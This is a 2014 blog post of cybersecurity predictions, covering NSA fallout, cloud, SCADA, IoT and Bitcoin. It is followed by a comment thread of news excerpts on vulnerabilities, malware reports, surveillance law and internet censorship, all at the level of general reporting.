Year 2014 will be a year of cybersecurity after the NSA revelations made in 2013: The headline news is that the NSA has surreptitiously “burrowed its way into nearly all the security architecture” sold by the world’s largest computer networking companies. A lot of people were shocked how NSA monitored and hacked almost everything in Internet. There will still be NSA aftershocks after new material comes out and different parties react to them (and news sources write about them). U.S. cloud services have been put into question for good reason. There will be a lot of NSA spying litigation. Those spying issues will also fuel some haktivism (it has already started to happen).
Security Professionals: Top Cyber Threat Predictions for 2014 article lists the following predictions that seem to pretty propable: Cybersecurity Regulatory Efforts Will Spark Greater Need for Harmonization, Service-Impacting Interruptions for Online Services Will Persist, We Will See an Increase in Cybercrime Activity Related to the World Cup, Rise of Regional Cloud Services, Dev-Ops Security Integration Fast Becoming Critical, Cybercrime that Leverages Unsupported Software will Increase, Increase in Social Engineering and Ransomware will Impact More People.
Ubiquitous mobile computing is all around us, which will lead to increased risks and concerns about social network privacy. Social networks have quickly become the key organizing principle of Internet communication and collaboration. Android anti-virus apps CAN’T kill nasties on sight like normal AV.
2013 was a very hacked year when there was many cases where information on millions or tens of millions of users were stolen from companies. It’s likely that we will see much more of the same in 2014, the way people use passwords and how the on-line services are built have not changed much in one year.
Gartner predicts that through 2014, improved JavaScript performance will begin to push HTML5 and the browser as a mainstream enterprise application development environment. I expect that HTML5 related security issues are increased due the fact that the technology being used more in 2014.
Over 50% of net traffic to web sited made by bots! More Than Half of Internet Traffic Is Just Bots article says that security and cloud service provider Incapsula analyzed and found out that more than 60 percent of internet traffic is computer generated, compared to less than 40 percent of traffic that is driven by human clicks. 31% of Bots Are Still Malicious. SEO link building has always a major motivation for automated link spamming, but it is decreasing due the fact that Google was able to discourage it. There are more advanced hacking and automatic vulnerability searching.
DDoS attacks are evolving from volumetric Layer 3-4 attacks to much more sophisticated and dangerous Layer 7 multi-vector threats.
There will be still many SCADA security issues in 2014. Even though traditional SCADA vulnerabilities have become easier to find, the increased connectivity brought with IoT will cause new issues. And there will still be very many controls systems openly accessible from the Internet for practically everybody who knows how to do that. There was a large number of SCADA systems found open in Internet in the beginning of 2013, and the numbers have not considerably dropped during the year. I expect that very many of those systems are still too open in the end of 2014.
The Internet is expanding into enterprise assets and consumer items such as cars and televisions. The Internet of Things (IoT) will evolve into the Web of Things, increasing the coordination between things in the real world and their counterparts on the Web. There will be many security issues to solve and as the system become more widely used more security issues on them will be found in them.
Cloud security will be talked about. Hopefully there will be some clear-up on the terminology on that area, because cloud security can mean a lot of things like the term cloud computing. Cloud security could mean how secure your cloud provider is, a service that runs on cloud filtering what comes through it (for example e-mails, web traffic), it could mean to product protecting some service running on cloud, or it could be a traditional anti-virus service that connects to cloud to advance it’s operation (for example update in real-time, verify unknown programs based on data on cloud). Research firm Gartner forecasts that cloud security sales will increase dramatically in the next few years. Cloud Security sales have increased over the past year by 2.1 billion to $ 3.1 billion in 2015.
Marketers try to put “cloud” term to security product brochures as much as they can. Cloud made from the traditional information security sound old-fashioned because companies are under pressure to move services to the cloud. Also, mobile devices and information security dispersed users to set new standards. OpenDNS ‘s CTO Dan Hubbard says that “Because of the data and equipment run in the cloud users with the cloud is the best way to protect them.” The Snowden Effect will also bring this year of PRIVATE cloud talk on table for security reasons because U.S. cloud services have been put into question for good reason.
In Finland a new Cyber Security Center started in the beginning of 2014. Security articles and warnings from it will be published at kyberturvallisuuskeskus.fi.
Late addition: Crypto-currencies like Bitcoin and similar are on the rise. Early adopters already use them already actively. Those crypto-currencies have many security related issues related to them. The values of the crypto-currencies vary quite much, and easily the value drops considerably when they get so used that different governments try to limit using them. Bitcoin is increasingly used as ramsonware payment method. Bitcoins have been stolen lately quite much (and I expect that to increase when usage increases), and those are stolen from users, on-line wallets and from exchanges. When more money is involved, more bad guys try to get into to get some of it. Sometimes bad guys do not try to steal your money, bit use resources you pay (your own PC, your server capacity, etc.) to generate money for them without you knowing about it. If you plan to use those crypto-currencies be careful to understand what you are doing with them, there is a real possibility that you can loose your money and there is no way that lost money can be recovered.
3,382 Comments
Tomi Engdahl says:
Cisco kicks off security kit/software/cloud combo
Realtime protection, apparently
http://www.theregister.co.uk/2014/04/23/cisco_kicks_off_security_kitsoftwarecloud_combo/
Cisco has added threat management to its portfolio, announcing Managed Threat Defense which it says brings realtime security to its customers.
Managed Threat Defense includes an “on-premise” solution, meaning there’s a box you can drop on your foot. It includes hardware, software and analytics
The customer-side kit is supported by Cisco’s security operations centres, which monitor the service and provide “incident response analysis, escalation, and remediation recommendations”, the company says.
Tomi Engdahl says:
AuDA starts final round of DNSSEC tests
August go-live
http://www.theregister.co.uk/2014/04/24/auda_starts_final_round_of_dnssec_tests/
AuDA has taken a tentative step towards the introduction of DNSSEC into the Australian domain space, signing the .au domain in its production environment as the first step in a four-month test.
DNSSEC has been possible for years, but has been held back by industry inertia. Under DNSSEC, a DNS (domain name system) record is signed, allowing resolvers to authenticate the relationship between domain name and IP address.
The problem for the ordinary sysadmin is that DNSSEC is needed all the way up the chain, from their own site back to the root zone
Tomi Engdahl says:
Cisco: you’re all malware hosts
Security report also notes skills shortage
http://www.theregister.co.uk/2014/04/24/cisco_youre_ialli_malware_hosts/
Everybody – at least every multinational that Cisco checked out for its 2014 Annual Security Report – is hosting malware of some kind, and there aren’t enough security professionals to go around.
Along with its Managed Threat Defense service launched this week, Cisco also launched the latest publication (here with registration) of its security survey. The study claims that “100 percent of companies [in the report's sample – El Reg] are calling malicious malware hosts”.
Cisco also believes that the length of time that such activity persists means that network penetrations are going undetected.
Java is the undisputed king of endpoint vulnerabilities, Cisco claims, with far more exploits than either Flash or PDF: 91 per cent of the live endpoint exploits detected by the Sourcefire FireAMP system attacked Java.
Cisco warns that companies can expect DDoS campaigns to last longer
Tomi Engdahl says:
Bank of England seeks ‘HACKERS’ to defend vaults against e-thieves
Report: 20 major cash-holders to be probed by white hats
http://www.theregister.co.uk/2014/04/24/ethical_hackers_drafted_to_probe_banks/
The Bank of England is planning to hire ethical hackers to conduct penetration tests on 20 “major” banks and other financial institutions, it has been reported.
The move appears to be a response to lessons learned during the Waking Shark II security response exercise last November.
“It’s encouraging to see the Bank of England taking a lead on protecting the UK’s critical national infrastructure by overseeing ethical hacking programmes,”
“Looking at the bigger security picture, the majority of serious data breaches use stolen or misused legitimate access privileges. Banks need strong, reliable systems in place to quickly identify any security vulnerabilities and take appropriate actions to prevent a breach and avoid financial and reputational damage,”
Tomi Engdahl says:
Patch iOS, OS X now: PDFs, JPEGs, URLs, web pages can pwn your kit
Plus: iThings and desktops at risk of NEW SSL attack flaw
By Shaun Nichols, 22 Apr 2014
http://www.theregister.co.uk/2014/04/22/apple_ios_7_1_1_os_x_security_updates/
Apple has released updates to its iOS and OS X operating systems that address serious security flaws.
The company said the iOS 7.1.1 upgrade will include, as well as some stability updates, fixes for 19 security flaws.
Tomi Engdahl says:
Australian Law Enforcement Pushes Against Encryption, Advocates Data Retention
http://yro.slashdot.org/story/14/04/24/0221204/australian-law-enforcement-pushes-against-encryption-advocates-data-retention
“Australia is in the middle of a parliamentary inquiry examining telecommunications interception laws.”
Tomi Engdahl says:
Data retention: Just like diamonds, metadata is forever
Senate inquiry into Telecommunications (Interception and Access) Act kicks off
http://www.computerworld.com.au/article/543389/data_retention_just_like_diamonds_metadata_forever/
Jevtovic said he was aware of the recent decision by the Court of Justice of the EU, which earlier this month struck down laws requiring telcos to retain metadata because they interfered with the right to privacy.
The ACC’s acting CEO said that what is important are the reasons for the CJEU decision, such as the lack of protection against abuse of the data retention regime.
“From my perspective our oversight regime [in Australia] does protect from the risk of abuse,”
Tomi Engdahl says:
Researchers slurp unencrypted Viber messaging data with ease
Images, videos, location and other data easily exposed, they claim
http://www.theregister.co.uk/2014/04/24/rakuten_viber_unencrypted_data_flaws/
Popular Whatsapp-like messaging service Viber is exposing users to man-in-the-middle and other attacks because it isn’t encrypting various data at rest and in transit, security researchers have warned.
Specifically, the team claimed that images, doodles and videos received are unencrypted; location data sent and received is unencrypted; and data is stored on the Viber Amazon servers in unencrypted format.
Tomi Engdahl says:
Lost codes spark Japan airport scramble on eve of Obama trip
https://nz.totaltravel.yahoo.com/news-opinions/news/a/-/22860549/lost-codes-spark-japan-airport-scramble-on-eve-of-obama-trip/
Airport authorities in Japan launched a frantic scramble to change security pass codes, an official said Tuesday, the day before Barack Obama arrives, after an airline employee dropped a memo containing the details.
The ministry instructed the firm that manages the airport to immediately change the pass codes, to avoid any danger of a security breach, the official said.
Tomi Engdahl says:
Tokyo airport employee loses handwritten passcodes ahead of Obama visit
http://nakedsecurity.sophos.com/2014/04/23/tokyo-airport-employee-loses-handwritten-passcodes-ahead-of-obama-visit/
The dangers associated with writing passwords down were expertly demonstrated by a Japanese airport worker over the weekend as the country prepared for the first visit by a US president in almost 20 years.
Speaking on Tuesday, a transport ministry official said that an employee of Skymark Airlines at Tokyo’s Haneda International Airport mislaid a printout containing key passcodes on Sunday.
The document was found just thirty minutes later on the floor of the departure lobby but the Japanese government were not prepared to take any chances.
the ministry instructed the company that manages Haneda International to change them immediately
it would be wise to also use a password manager, such as KeePass or LastPass, which will allow you to store many complex passwords whilst only needing to remember one – and, whatever you do, don’t write it down!
Tomi Engdahl says:
All at sea: global shipping fleet exposed to hacking threat
http://www.reuters.com/article/2014/04/24/us-cybersecurity-shipping-idUSBREA3M20820140424
The next hacker playground: the open seas – and the oil tankers and container vessels that ship 90 percent of the goods moved around the planet.
As industries like maritime and energy connect ships, containers and rigs to computer networks, they expose weaknesses that hackers can exploit.
Hackers recently shut down a floating oil rig by tilting it, while another rig was so riddled with computer malware
Somali pirates help choose their targets by viewing navigational data online
researchers say they have discovered significant holes in the three key technologies sailors use to navigate
GPS
AIS
ECDIS
“Increasingly, the maritime domain and energy sector has turned to technology to improve production, cost and reduce delivery schedules,” a NATO-accredited think-tank wrote in a recent report. “These technological changes have opened the door to emerging threats and vulnerabilities as equipment has become accessible to outside entities.”
A recent study by security company Rapid7 found more than 100,000 devices – from traffic signal equipment to oil and gas monitors – were connected to the internet using serial ports with poor security.
Tomi Engdahl says:
Tokyo Court orders bankruptcy trustee to begin Mt. Gox liquidation
http://www.reuters.com/article/2014/04/24/us-bitcoin-mtgox-bankruptcy-idUSBREA3N0KM20140424
Tokyo District Court ordered liquidation to begin at failed bitcoin exchange Mt. Gox
Tomi Engdahl says:
Dell, Cisco, Microsoft, Google and friends shower OpenSSL in $$$s to make it all better
Web, IT goliaths to pour gold into more open-source code
http://www.theregister.co.uk/2014/04/24/linux_foundation_core_infrastructure/
The Linux Foundation announced on Thursday that it had formed “The Core Infrastructure Initiative” to fund open projects that are critical to the functioning of the internet.
The goal is to make sure the recent Heartbleed OpenSSL vulnerability and worse omnishambles never happen again. It comes after the chap who accidentally introduced the Heartbleed bug called for more people to work on the OpenSSL code.
“The Core Infrastructure Initiative is a multi-million dollar project housed at The Linux Foundation to fund open-source projects that are in the critical path for core computing functions,” the Linux Foundation declared.
Tomi Engdahl says:
Covert Bitcoin miner found stashed in malicious Google Play apps
Titles raise questions about Google’s ability to police its own market.
http://arstechnica.com/security/2014/04/covert-bitcoin-miner-found-stashed-in-malicious-google-play-apps/
Researchers scouring the official Google Play market have unearthed more Android apps that surreptitiously abuse end-user devices to carry out the computationally intensive process of mining Bitcoins.
The malware, dubbed “BadLepricon” by its creators, was stowed away inside five separate wallpaper apps that had from 100 to 500 downloads each
The Bitcoin mining happened only when the battery level was at 50 percent or higher, presumably as a means to prevent infected users from knowing that their device was running the mining code.
Tomi Engdahl says:
Malware designed to take over cameras and record audio enters Google Play
Covert remote access trojan was built using newly discovered DIY toolkit.
http://arstechnica.com/security/2014/03/malware-designed-to-take-over-cameras-and-record-audio-enters-google-play/
The scourge of the remote access trojan (RAT)—those predatory apps that use Web microphones and cameras to surreptitiously spy on victims—has formally entered the Android arena.
The specific RAT in Google Play was disguised as a legitimate app called Parental Control, according to Marc Rogers, principal security researcher at Lookout Mobile, a provider of antimalware software for Android phones.
The Parental Control trojan was built using Dendroid, a newly discovered software development tool that sells for about $300. Dendroid provides an impressive suite of features, including all the tools to build the command and control infrastructure to control RATted phones and receive audio and video captured from their mics and cameras. Dendroid also allows attackers to intercept, block, or send SMS text messages on compromised phones; download stored pictures and browser histories; and open a dialogue box that asks for passwords. It includes “binder” functions that allow the malicious code to be attached, or bound, into otherwise useful or innocuous apps.
Dendroid also gives apps the ability to evade Bouncer, Google’s cloud-based service that scours the Android Market for malicious apps.
Tomi Engdahl says:
10 Top Information Security Threats for the Next Two Years
http://www.cio.com/slideshow/detail/149359/10-Top-Information-Security-Threats-for-the-Next-Two-Years#slide1
Each year, the Information Security Forum, a nonprofit association that researches and analyzes security and risk management issues, releases its ‘Threat Horizon’ report to provide members with a forward-looking view of the biggest security threats over a two-year horizon. Here are the top 10 threats through 2016.
Tomi Engdahl says:
Chinese Government Shuns ‘Expensive’ Windows 8
Senior officials are looking to patch up the outdated Windows XP software rather than pay for an “expensive” upgrade.
http://news.sky.com/story/1247630/chinese-government-shuns-expensive-windows-8
The Chinese government will try to patch up the outdated Windows XP operating system -because it is too expensive to upgrade.
Senior official Yan Xiaohong said: “Security problems could arise because of a lack of technical support after Microsoft stopped providing services, making computers with XP vulnerable to hackers.”
Chinese security providers have released special protection products to patch up the system, which the government is now “appraising” for use.
Windows 8 costs 888 yuan (£84) in China.
In the US, nearly 18% of computers still use XP – in China the figure is estimated to be closer to 70%.
Tomi Engdahl says:
Putin ramps up Internet censorship, citing Google and Snowden to ensure public support
http://pando.com/2014/03/20/putin-ramps-up-internet-censorship-citing-google-and-snowden-to-ensure-public-support/
The ongoing conflict between Russia, Ukraine and the West has unleashed some very dark latent fascist forces — not just on the ground, but also in cyberspace.
On March 13, a half-dozen highly trafficked opposition blogs and indie media outlets were suddenly blocked within Russia.
There was no court order, no trial, not even a public hearing. But there’s no doubt the move was official
Russians Selectively Blocking Internet
http://www.nytimes.com/2013/04/01/technology/russia-begins-selectively-blocking-internet-content.html?pagewanted=all&_r=0
The Russian Government Has Started Censoring the Internet
http://gizmodo.com/5993112/the-russian-government-has-started-censoring-the-internet
The Russian government in recent weeks has been making use of a new law that gives it the power to block Internet content that it deems illegal or harmful to children.
The country’s communications regulators have required Facebook, Twitter and YouTube to remove material that the officials determined was objectionable, with only YouTube, owned by Google, resisting.
But opposition leaders have railed against the law as a crack in the doorway to broader Internet censorship. They say they worry that social networks, which have been used to arrange protests against President Vladimir V. Putin, will be stifled.
Russia blocks web pages linked to Ukraine protests
http://www.politico.com/story/2014/03/russia-ukraine-protests-websites-internet-104171.html
Tomi Engdahl says:
Tales from the Internet World Cup: ICANN tell nothing will change
Brazilian striker aside… it’s all very model UN
http://www.theregister.co.uk/2014/04/25/internet_global_multistakeholder_meeting_on_the_future_of_internet_governance/
NetMundial’s internet conference, the much-hyped, over-excited lovechild of Edward Snowden’s NSA revelations, has been significantly more subdued than people thought it would be.
Despite everyone’s best efforts, NetMundial is a damp squib.
But despite repeated and very public calls for a clampdown on internet surveillance, the whole issue is being carefully sidestepped in São Paulo. The entire idea that people are accessing and using our interactions online in a way that would have blown George Orwell’s mind has been anaesthetised.
What will we all get out of NetMundial? For the ordinary observer, nothing at all. The final text will be bland, vague and almost entirely pointless. But if you are an Internet governance professional, well, then things have really changed.
At the next meeting, there will be an expectation to produce a document that contains real details of movement and agreement.
Tomi Engdahl says:
Beijing’s anti-smut crackdown catches ‘Chinese Twitter’ Weibo red-handed
China’s largest microblog service has two licenses revoked
http://www.theregister.co.uk/2014/04/25/sina_weibo_license_revoked_lewd_content/
Sina, the company that owns China’s über-popular Twitter-like service Weibo, has had two key licences withdrawn by Beijing in retaliation for allegedly allowing the publication of articles and videos containing pornographic content.
The harsh treatment of one of China’s biggest internet companies is part of a renewed crackdown on “lewd” or pornographic content
Weibo – which boasts 600 million registered users, less than half of whom are active – recently filed for a $500m IPO in the US.
Tomi Engdahl says:
Bankrupt Bitcoin bunker blender begins: MtGox admin starts liquefaction
But where’s the missing 650k-ish BTC?
http://www.theregister.co.uk/2014/04/24/mt_gox_files_for_bankruptcy/
Submitting a claim may also involve abandoning some of the pseudo-anonymity that crypto-cash’s users hold dear. Anyone who has not provided MtGox with a valid name and address may not be notified of the ongoing status of the bankruptcy claims.
Tomi Engdahl says:
So far, so SOPA: Web campaigners to protest world’s biggest ever free trade deal
Worries over increased censorship despite stalled talks
http://www.theregister.co.uk/2014/04/25/obama_japan_tpp_internet_protest/
Internet activists are planning a major on- and offline protest at what has been described as a “secretive, SOPA-like” agreement being hammered out as the world’s largest economies attempt to agree the world’s biggest ever free trade deal.
Unfortunately, we thought this type of wholesale internet censorship died after our historic victory against SOPA. But it looks like some of the worst parts of SOPA have found their way into the TPP.
Tomi Engdahl says:
Vladimir Putin Claims The Internet Is ‘A CIA Project’
http://www.nbcnews.com/storyline/ukraine-crisis/vladimir-putin-claims-internet-cia-project-n88766
Russian President Vladimir Putin claimed Thursday that the Internet is “a CIA project,” adding that Moscow needed to “fight” to resist this U.S. influence.
Russia is keen to moderate the information super-highway, where opponents of the government who are barred from national television amass their support.
Tomi Engdahl says:
Spy back doors? That would be suicide, says Huawei
‘Impeccable track record’ clearly means we’re not a spy conduit, says mouthpiece
http://www.theregister.co.uk/2014/04/25/huawei_responds_to_spying_allegations/
Chinese hardware manufacturer Huawei says allegations it provides backdoors for espionage in its kit remain unproven and would be “commercial suicide”.
“The hypothetical – that our equipment could be used for espionage by the Chinese government – has never been proven,” spokesman Scott Sykes told press at the company’s annual global analyst event in Shenzen this week.
“If it were ever proven, we would lose 65 per cent of our business overnight. That would be corporate suicide.”
However, documents disclosed by Edward Snowden this year suggest Huawei may be more sinned against than sinner. The US National Security Agency’s ‘Tailored Access Operations’ unit broke into Huawei’s corporate servers, and by 2010 was reading corporate email and examining the source code used in Huawei’s products.
Tomi Engdahl says:
Microsoft Issues Advisory For Internet Explorer Vulnerability
http://it.slashdot.org/story/14/04/27/206232/microsoft-issues-advisory-for-internet-explorer-vulnerability
“Neowin reports how Microsoft made a rare weekend post on its Security Response Center blog to announce an advisory that affects all currently supported versions of Internet Explorer (versions 6 to 11).”
Microsoft issues security advisory for Internet Explorer exploit
http://www.neowin.net/news/microsoft-issues-security-advisory-for-internet-explorer-exploit
The blog post states that the exploit “allows remote code execution if users visit a malicious website with an affected browser. This would typically occur by an attacker convincing someone to click a link in an email or instant message.” The company is aware of “limited, targeted attacks” that have used the exploit.
IE 10 and 11 are protected against attacks using this exploit if they have their Enhanced Protected Mode turned on.
Tomi Engdahl says:
Microsoft releases Security Advisory 2963983
http://blogs.technet.com/b/msrc/archive/2014/04/26/microsoft-releases-security-advisory.aspx
Today, we released Security Advisory 2963983 regarding an issue that impacts Internet Explorer. At this time, we are only aware of limited, targeted attacks. This issue allows remote code execution if users visit a malicious website with an affected browser. This would typically occur by an attacker convincing someone to click a link in an email or instant message.
Tomi Engdahl says:
Microsoft Security Advisory 2963983
Vulnerability in Internet Explorer Could Allow Remote Code Execution
Published: April 26, 2014
https://technet.microsoft.com/en-US/library/security/2963983
Microsoft is aware of limited, targeted attacks that attempt to exploit a vulnerability in Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, and Internet Explorer 11.
The vulnerability is a remote code execution vulnerability. The vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated. The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer. An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website.
Tomi Engdahl says:
Apache Struts Zero Day Not Fixed By Patch:
The Apache Software Foundation today released an advisory warning that a patch issued in March for a zero-day vulnerability in Apache Struts did not fully patch the bug in question.
Source: https://threatpost.com/apache-warns-of-faulty-zero-day-patch-for-struts/105691
Tomi Engdahl says:
Bitcoin Slips Following News Of Fresh Restrictions In China
http://techcrunch.com/2014/04/27/bitcoin-slips-following-news-of-fresh-restrictions-in-china/
Tomi Engdahl says:
Here we go again: Viber mobile messenger app leaves user data unencrypted
http://nakedsecurity.sophos.com/2014/04/24/here-we-go-again-viber-mobile-messenger-app-leaves-user-data-unencrypted/
Tomi Engdahl says:
Google improved its HTTPS connections for Chrome for Android in February
Making it three times faster and better protect against threats
http://www.theinquirer.net/inquirer/news/2341688/google-improved-its-https-connections-for-chrome-for-android-in-february
GOOGLE HAS ANNOUNCED that it improved HTTPS connections for Chrome for Android, making it three times faster and stronger against future security vulnerabilities like Heartbleed.
“Earlier this year, we deployed a new TLS cipher suite in Chrome that operates three times faster than AES-GCM on devices that don’t have AES hardware acceleration, including most Android phones, wearable devices such as Google Glass and older computers,” Google anti-abuse research lead Elie Bursztein explained.
Tomi Engdahl says:
The world’s total denial of service attacks last year’s fourth quarter, 43 percent came from China, it turns out Akamai’s recent report. The second largest manufacturer of attacks was the USA. Third was Canada.
In the fourth quarter, the number of attacks increased by 75 percent compared to the same period last year.
During the fourth quarter of 2013, Akamai observed attack traffic originating from source IP addresses in 188 unique countries/regions. China remained in the top slot, growing to 43% of observed attack traffic.
Overall attack traffic concentration across the top 10 countries/regions was up slightly from the third quarter, growing to 88% of observed attacks.
Port 445 remained the most targeted port, growing once again and reaching 30%
of observed attacks. The volume of attacks targeting Port 80 remained steady at 14%
Enterprise and Commerce customers together accounted for just under 70% of the
reported attacks during the quarter, while just under half of the total attacks were reported by customers in the Americas.
rise of a set of attacks in which the Skipfish and Vega Web application vulnerability
scanners were used to target a variety of organizations, looking for Remote File Inclusion (RFI) vulnerabilities
Sources:
http://www.tietoviikko.fi/kaikki_uutiset/totuus+kyberhyokkayksista+lahes+joka+toinen+tulee+kiinasta/a984090
http://www.akamai.com/dl/akamai/akamai-soti-q413.pdf?WT.mc_id=soti_Q413
Tomi Engdahl says:
DOJ Whines That A Warrant To Search A Mobile Phone Makes It More Difficult To Catch Criminals
http://www.techdirt.com/articles/20140423/15081827008/government-argues-that-warrant-requirement-cell-phone-searches-does-nothing-keep-cops-catching-bad-guys.shtml
The government argues that impartial technological advancements somehow favor criminals. As it sees it, the path to the recovery of evidence should not be slowed by encryption or wiping or even the minimal effort needed to obtain a warrant. The police are presented as forever behind the curve, despite evidence otherwise. Without a doubt, there’s an ongoing arms race between deletion technology and recovery technology, but the gap between the two isn’t nearly as large as the government portrays it.
But what really deserves attention here is the government’s antipathy towards encryption and other protective technology.
Criminals might use these methods. That’s a given. But what about anyone worried about their phone being stolen, especially considering the wealth of information stored on it? Does the government plan to take a stance against law enforcement’s push for cell phone “kill switches?”
Tomi Engdahl says:
Now, it happened: the attackers found unfixed security hole in the Windows XP
Microsoft said Saturday the data of criminals exploiting the Windows XP operating system related to the aperture, which is the first discovered security problem on the operating system after the end.
A security hole for the Internet Explorer browser, version 6 to version 11 at all times
This security vulnerability is not corrected in Windows XP, which support ended in early April.
Windows XP users to improve operating system security, can install the Enhanced Mitigation Experience Toolkit (Emet) 4.1 security package that can be downloaded from Microsoft’s website at
http://www.microsoft.com/en-us/download/details.aspx?id=41138
The security can also improved with third-party security applications and using a different web browser, such as Google Chrome or Mozilla Firefox.
Source:
http://www.tietoviikko.fi/kaikki_uutiset/nyt+se+tapahtui+hyokkaajat+loysivat+windows+xphen+liittyvan+paikkaamattoman+aukon/a984364
Tomi Engdahl says:
SunnComm to sue ‘Shift key’ student for $10m
Alleges DMCA violation, damage to its reputation
http://www.theregister.co.uk/2003/10/09/sunncomm_to_sue_shift_key/
SunnComm has threatened Princeton PhD student Alex Halderman with the Digital Millennium Copyright Act (DMCA) for exposing a key weakness in the company’s latest CD copy protection technology, MediaMax CD3.
The company said today it will take legal action against Halderman for revealing how MediaMax CD3 can be bypassed by holding down a Windows PC’s Shift key when a protected disc is inserted.
Doing so temporarily disables Windows’ Autorun facility – which many Reg readers have turned off anyway, they tell us – which prevents a small installation app from being launched off the CD.
Bypassing Autorun allows full access to the CD’s songs.
SunnComm today said the paper was “erroneous” and contains “false conclusions”.
SunnComm claims Halderman broke the law by revealing the name of the driver the app installs.
Bypassing Autorun by holding down the Shift key is a documented feature, after all.
“I hardly think that telling people to push shift constitutes trafficking in a (copy-protection technology) circumvention device,”
Tomi Engdahl says:
US judge: our digital search warrants apply ANYWHERE
Azure looking less lovely as Microsoft ordered to hand over e-mails held in Dublin
http://www.theregister.co.uk/2014/04/28/us_judge_digital_search_warrants_apply_everywhere/
Microsoft has been told by a US District Court that it must hand over e-mail details to an unnamed law enforcement agency, even though that data is held offshore.
District Court of Southern New York, Judge James Francis has ruled that the tech giant “cannot refuse to turn over customer information and emails stored in other countries when issued a valid search warrant from U.S. law enforcement agencies,” according to Reuters.
The ruling will be a blow to Microsoft’s attempts to assure non-US customers that their cloud data is safe from American spooks’ demands for access.
Microsoft has responded by saying that customer data outside America shouldn’t be subject to search and seizure by US authorities, and is seeking a review of the decision.
Tomi Engdahl says:
Mathematicians Push Back Against the NSA
http://science.slashdot.org/story/14/04/27/1747230/mathematicians-push-back-against-the-nsa
“The NSA and GCHQ need mathematicians in order to function — they are some of the biggest employers of mathematicians in the world. This New Scientist article by a mathematician describes some of the math behind mass surveillance, and calls on other mathematicians to refuse to cooperate with the NSA/GCHQ while they continue to surveil the entire population.”
Tomi Engdahl says:
Maths spying: The quandary of working for the spooks
http://www.newscientist.com/article/mg22229660.200-maths-spying-the-quandary-of-working-for-the-spooks.html?full=true#.U15an1dM0ik
Intelligence agencies hire lots of mathematicians, but would-be employees must realise that their work is misused to snoop on everyone, says Tom Leinster
The standard justification for this mass surveillance is to avert terrorism. US officials repeatedly claimed that mass surveillance had thwarted 54 attacks. But the NSA eventually admitted it was more like one or two; its best example was an alleged $8500 donation to a terrorist group.
Some argue that the information gathered is “only metadata” – phone numbers and call durations rather than what was said, for example. This is not true.
And so to the mathematicians’ role in all of this. The NSA claims to be the largest employer of mathematicians in the US. It may be the largest in the world. It part funds GCHQ, also a major employer of mathematician
We will never know exactly what mathematicians have done for these agencies.
Tomi Engdahl says:
Bad news: Hackers hit new Internet Explorer bug. More bad news: No patch yet
Worse news: Windows XP users unlikely to ever see a fix
http://www.theregister.co.uk/2014/04/27/oops_we_did_it_again_microsoft_warns_of_ie_zero_day/
Vulnerability CVE-2014-1776, to give the problem its formal name, allows miscreants to hijack at-risk Windows computers.
Internet Explorer 6 through 11 are all at risk, on all current versions of Windows from Vista to 8 and Windows Server 2003 to 2012 R2. The bug is thought to be present in IE on Windows XP, although that operating system is no longer supported.
deploy version 4.1 of The Enhanced Mitigation Experience Toolkit
Microsoft suggests a few other workarounds, such as switching on IE’s Enhanced Protected Mode or setting security levels to “High” to stop ActiveX controls and Active Scripting working.
Tomi Engdahl says:
Reg probe bombshell: How we HACKED mobile voicemail without a PIN
Months after Leveson inquiry, your messages are still not secure
http://www.theregister.co.uk/2014/04/24/voicemail_still_easy_to_hack/
Voicemail inboxes on two UK mobile networks are wide open to being hacked. An investigation by The Register has found that even after Lord Leveson’s press ethics inquiry, which delved into the practice of phone hacking, some telcos are not implementing even the most basic level of security.
There was a lot of brouhaha over some newspapers accessing people’s voicemail without permission, but one of the strange things about it all is that at no stage have any fingers been pointed at the mobile phone networks for letting snoops in. And some doors are still open.
If you call your voicemail service from a handset linked to the account, you go through to your message inbox without the need to enter a PIN
Unfortunately, as our reader found out, this caller identification isn’t at all secure and can be spoofed, so we looked at Three, EE (and Orange), O2 and Vodafone.
Tomi Engdahl says:
Sat comms kit riddled with backdoors for hackers – researcher
Right, shipmate, identify yourself. LOL? What’s your meaning?
http://www.theregister.co.uk/2014/04/23/sat_comm_vulns/
Security researchers claim to have uncovered myriad security problems with satellite communication systems. But while major manufacturer Iridium said the security weaknesses identified by security researchers at IOActive were in hand, Thuraya, another satellite comms service, has criticised the report as inaccurate.
Multiple high risk vulnerabilities were uncovered in all SATCOM device firmware studied by IOActive.
If one of these affected devices can be compromised, the entire SATCOM infrastructure could be at risk.
Ships, aircraft, military personnel, emergency services, media services, and industrial facilities (oilrigs, gas pipelines, water treatment plants, wind turbines, substations, etc.) could all be impacted by these vulnerabilities.
Tomi Engdahl says:
Supreme Court to rule on warrantless searches of electronic devices
Cops want access, without warrants, to electronic devices of everybody arrested.
http://arstechnica.com/tech-policy/2014/04/supreme-court-to-rule-on-warrantless-searches-of-electronic-devices/
The Supreme Court on Tuesday will take on the digital-age controversy over search and seizure of smartphones and other devices.
President Barack Obama’s administration and prosecutors from states across the country have lobbied for police officers to be able to search arrestees’ gadgets—at or about the time of arrest—without a warrant. Such action, however, demands an examination of the Fourth Amendment’s protection against “unreasonable searches and seizures.
Tomi Engdahl says:
Drink me: Adobe pours Flash Player bug squash
Mad dash to slap critical patch on zero day hole
http://www.theregister.co.uk/2014/04/28/adobe_flash_update/
Adobe is pushing out a cross-platform security fix for a bug in its Flash Player that miscreants are already exploiting.
Windows users running Adobe Flash Player 13.0.0.182 and earlier need to update it following the discovery of a zero-day attack.
“Adobe is aware of reports that an exploit for CVE-2014-0515 exists in the wild, and is being used to target Flash Player users on the Windows platform,” the software maker warned.
Tomi Engdahl says:
Apple patches another major security hole in its website that allowed access to all developer personal information
http://9to5mac.com/2014/04/28/apple-patches-another-major-security-hole-in-its-website-that-allowed-access-to-all-developer-personal-information/
Tomi Engdahl says:
It’s Crazy What Can Be Hacked Thanks to Heartbleed
http://www.wired.com/2014/04/heartbleed_embedded/
Western Digital makes a tiny box where you can store all your photos and other digital stuff. It’s called My Cloud, and you’ve probably seen the TV ads hawking the thing. It gives you a way to access your stuff from any machine, across the internet.
In the ad, while the rest of humanity is camped out atop one big giant cloud, their digital data exposed to prying eyes and sometimes vanishing altogether, one smiling woman sits on her own personal cloud — confident all her data is completely safe. With My Cloud, Western Digital says, you too can have such confidence.
